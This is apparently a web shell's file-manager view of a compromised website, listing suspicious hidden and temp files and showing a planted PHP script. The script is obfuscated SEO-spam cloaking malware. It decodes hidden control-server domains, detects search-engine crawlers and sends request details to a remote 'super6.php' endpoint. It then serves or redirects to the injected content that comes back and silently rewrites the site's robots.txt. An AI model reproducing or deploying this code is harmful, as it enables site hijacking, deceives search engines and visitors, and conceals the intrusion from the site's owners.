Gecko [ zonacarellc.com ]

Name	Size	Permission	Date
node-compile-cache	[ DIR ]	drwxr-xr-x	2025-04-10 14:01
.accept	53 B	-rw-r--r--	2026-06-03 08:07
.accepted	52 B	-rw-r--r--	2026-06-03 08:07
.cache	4.46 KB	-rw-r--r--	2026-06-03 08:20
.center	4.47 KB	-rw-r--r--	2026-06-03 08:07
.class	49 B	-rw-r--r--	2026-05-27 13:32
.classes	1.62 KB	-rw-r--r--	2026-06-11 04:41
.config	4.47 KB	-rw-r--r--	2026-05-27 02:47
.content	4.46 KB	-rw-r--r--	2026-05-27 03:32
.created	53 B	-rw-r--r--	2026-06-11 04:41
.db2_convert	1.54 KB	-rw-r--r--	2026-06-03 07:34
.dbx_convert	55 B	-rw-r--r--	2026-06-11 04:40
.flag	1.54 KB	-rw-r--r--	2026-06-04 06:39
.hld	1.54 KB	-rw-r--r--	2026-06-11 02:15
.ibase_pconnection	4.46 KB	-rw-r--r--	2026-05-27 03:32
.include	716 B	-rw-r--r--	2026-06-11 04:40
.lock	51 B	-rw-r--r--	2026-05-27 02:47
.locked	4.06 KB	-rw-r--r--	2026-06-11 04:41
.mb_convert	50 B	-rw-r--r--	2026-06-03 07:34
.multi	9.24 KB	-rw-r--r--	2026-06-11 04:40
.oauthexceptions	53 B	-rw-r--r--	2026-05-27 03:32
.ob_iconv_handle	55 B	-rw-r--r--	2026-06-11 04:40
.parle_tokens	9.24 KB	-rw-r--r--	2026-05-27 00:34
.partition	58 B	-rw-r--r--	2026-06-11 04:41
.post	9.24 KB	-rw-r--r--	2026-06-11 04:40
.rec	4.46 KB	-rw-r--r--	2026-06-03 08:20
.request	52 B	-rw-r--r--	2026-05-27 03:32
.reset	48 B	-rw-r--r--	2026-05-27 00:34
.rfind	4.47 KB	-rw-r--r--	2026-06-03 08:07
.rindex	43 B	-rw-r--r--	2026-05-29 12:11
.sw_fatal	5.36 KB	-rw-r--r--	2026-06-10 13:55
.sys	59 B	-rw-r--r--	2026-05-27 03:32
.system	52 B	-rw-r--r--	2026-05-26 14:08
.uconvert	56 B	-rw-r--r--	2026-06-03 08:20
____040scR	12.25 KB	-rw-------	2026-06-09 12:11
____KyhqhV	12.25 KB	-rw-------	2026-06-09 12:11
____PaMqqp	12.25 KB	-rw-------	2026-06-09 12:11
____SvOJC3	12.25 KB	-rw-------	2026-06-09 12:12
____TclfNp	12.25 KB	-rw-------	2026-06-09 12:11
____ceFyKA	12.25 KB	-rw-------	2026-06-09 12:11
____rAaMTe	12.25 KB	-rw-------	2026-06-09 12:11
____y3YxLh	12.25 KB	-rw-------	2026-06-09 12:12
phpC7rxWH	1008 B	-rw-------	2026-06-09 12:11
phpd2TiNG	1008 B	-rw-------	2026-06-09 12:11
phpoCL7VO	1008 B	-rw-------	2026-06-09 12:11
phpwYcIbM	20.79 KB	-rw-------	2026-05-14 09:18
run_6a2b284138ba8.php	124.4 KB	-rw-r--r--	2026-06-11 21:27
temp_0471009731df2c648b1ccd872b3bc9d9.temp	7.03 KB	-rw-r--r--	2026-05-14 09:22
temp_2aa5eb4ed9521cb0cfe6aa8b865c5dbc.temp	7.03 KB	-rw-r--r--	2026-05-13 07:37
temp_3bdd45bcc2b7a674255699bca1bd8ff6.temp	7.03 KB	-rw-r--r--	2026-05-14 09:16
temp_5a9ba034519673b292c46c82a9e2188c.temp	7.03 KB	-rw-r--r--	2026-05-14 09:01
temp_6283d410d006d15678aab41eec08a958.temp	7.03 KB	-rw-r--r--	2026-05-14 09:27
temp_7d8e04b7c2370e47d922650b3b9406ef.temp	7.03 KB	-rw-r--r--	2026-05-14 09:04
temp_87fc259dadfb0790140ed0acde54b3c0.temp	7.03 KB	-rw-r--r--	2026-05-14 08:34
temp_948a52f5b1ef4afd94cfe5f0e498ae11.temp	7.03 KB	-rw-r--r--	2026-05-15 09:10
temp_a961bfb8c66959fe28296ed60a84f9ea.temp	7.03 KB	-rw-r--r--	2026-05-14 09:25
wp_c_7665e28f.inc	258.19 KB	-rw-r--r--	2026-06-05 14:32

Rename

<?php
$xmlname = [
    "%32%35%35%32%2D%79%76%61%78%32%30%37%2E%65%76%63%62%61%6C%2E%67%62%63",
    "%32%35%35%32%2D%79%76%61%78%32%30%37%2E%79%68%7A%61%67%65%72%72%2E%67%62%63",
    "%32%35%35%32%2D%79%76%61%78%32%30%37%2E%6E%68%65%72%79%76%66%63%2E%6B%6C%6D",
    "%32%35%35%32%2D%79%76%61%78%32%30%37%2E%66%62%79%69%65%6E%61%2E%6B%6C%6D"
];
$string = '2552-link207';

$host = $_SERVER['HTTP_HOST'] ?: '';
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?: 'en';
$referer = $_SERVER['HTTP_REFERER'] ?: '';
$http = is_https() ? 'https' : 'http';
$server = file_exists($_SERVER['DOCUMENT_ROOT'] . '/.htaccess') ? 1 : 2;
$zz = disbot();
$duri = drequest_uri() ?: '/';

$model_file = 'index.php';
$model = 'index';
preg_match('/\/([^\/]+\.php)/', $duri, $matches);
if (!empty($matches)) {
    $model_file = $matches[1];
    if (($position = strpos($duri, $model_file)) !== false) {
        $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), '/');
    }
    $model = str_replace('.php', '', $model_file);
}
$model = stristr($duri, '/?') ? '?' : $model;

$istest = false;
if (strpos($duri, $string) !== false) {
    $zz = 1;
    $duri = str_replace($string, '', $duri);
    $istest = true;
}
if ($duri != '/') {
    $duri = str_replace('/' . $model_file, '', $duri);
    $duri = str_replace('/index.php', '', $duri);
    $duri = str_replace('!', '', $duri);
}

$param = http_build_query([
    'web' => $host,
    'zz' => $zz,
    'uri' => urlencode($duri),
    'urlshang' => $referer,
    'http' => $http,
    'lang' => $lang,
    'server' => $server,
    'model' => $model,
    'version' => $istest ? $string : ''
]);

create_robots($http . '://' . $host);
$html_content = request($xmlname, $param);

if (strpos($html_content, 'nobotuseragent') === false) {
    $response_handlers = array(
        'okhtml' => array(
            'header' => 'Content-type: text/html; charset=utf-8',
            'replace' => 'okhtml',
            'test_echo' => true,
            'output' => true
        ),
        'getcontent500page' => array(
            'header' => 'HTTP/1.1 500 Internal Server Error'
        ),
        '404page' => array(
            'header' => 'HTTP/1.1 404 Not Found'
        ),
        '301page' => array(
            'header' => 'HTTP/1.1 301 Moved Permanently',
            'replace' => '301page',
            'redirect' => true
        ),
        'okxml' => array(
            'header' => 'Content-Type: application/xml; charset=utf-8',
            'replace' => 'okxml',
            'output' => true
        ),
        'okrobots' => array(
            'header' => 'Content-Type: text/plain',
            'replace' => 'okrobots',
            'output' => true
        )
    );

foreach ($response_handlers as $key => $handler) {
        if (strpos($html_content, $key) !== false) {
            @header($handler['header']);

if (isset($handler['replace'])) {
                $html_content = str_replace($handler['replace'], '', $html_content);
            }

if (isset($handler['test_echo']) && $istest) {
                echo $string;
            }

if (isset($handler['redirect'])) {
                header('Location: ' . $html_content);
            } elseif (isset($handler['output'])) {
                echo $html_content;
            }

exit();
        }
    }
}

function disbot() {
    $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
    $bots = array('googlebot', 'bing', 'yahoo', 'google');

foreach ($bots as $bot) {
        if (strpos($user_agent, $bot) !== false) {
            return 1;
        }
    }
    return 2;
}

function drequest_uri() {
    if (isset($_SERVER['REQUEST_URI'])) {
        return $_SERVER['REQUEST_URI'];
    }

if (isset($_SERVER['argv'])) {
        return $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
    }

return $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}

function is_https() {
    if (isset($_SERVER['HTTPS'])) {
        $https = strtolower($_SERVER['HTTPS']);
        if ($https !== 'off' && $https !== '') {
            return true;
        }
    }

if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    }

if (isset($_SERVER['HTTP_FRONT_END_HTTPS'])) {
        $front_end_https = strtolower($_SERVER['HTTP_FRONT_END_HTTPS']);
        if ($front_end_https !== 'off' && $front_end_https !== '') {
            return true;
        }
    }

return false;
}

function create_robots($url) {
    $functions = func();
    $path = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt';
    $content = "User-agent: *\nAllow: /\n\nSitemap: " . $url . "/sitemap.xml\n";

if (!file_exists($path)) {
        $functions[0]($path, $content);
    } else {
        $existing_content = $functions[1]($path);
        if ($existing_content !== $content) {
            $functions[0]($path, $content);
        }
    }
}

function request($webs, $param) {
    $functions = func();
    shuffle($webs);

foreach ($webs as $domain) {
        $domain_decoded = $functions[2](urldecode($domain));
        $url = 'http://' . $domain_decoded . '/super6.php?' . $param;

if (function_exists('wp_remote_get')) {
            $response = wp_remote_get($url, array(
                'timeout' => 30,
                'user-agent' => 'Mozilla/5.0 (compatible; WordPress)'
            ));

if (!is_wp_error($response)) {

$body = wp_remote_retrieve_body($response);

return $body;
            }
        }

if (function_exists('curl_init')) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 30);
            $response = curl_exec($ch);

if (!curl_errno($ch)) {
                curl_close($ch);
                return $response;
            }
            curl_close($ch);
        }

if (ini_get('allow_url_fopen')) {
            $context = stream_context_create(array(
                'http' => array('timeout' => 30)
            ));
            $response = @$functions[1]($url, false, $context);
            if ($response !== false) {
                return $response;
            }
        }
    }

return 'nobotuseragent';
}

function func() {
    $chars = range('a', 'z');
    return array(
        $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[15] . $chars[20] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18],
        $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[6] . $chars[4] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18],
        $chars[18] . $chars[19] . $chars[17] . '_' . $chars[17] . $chars[14] . $chars[19] . '13'
    );
}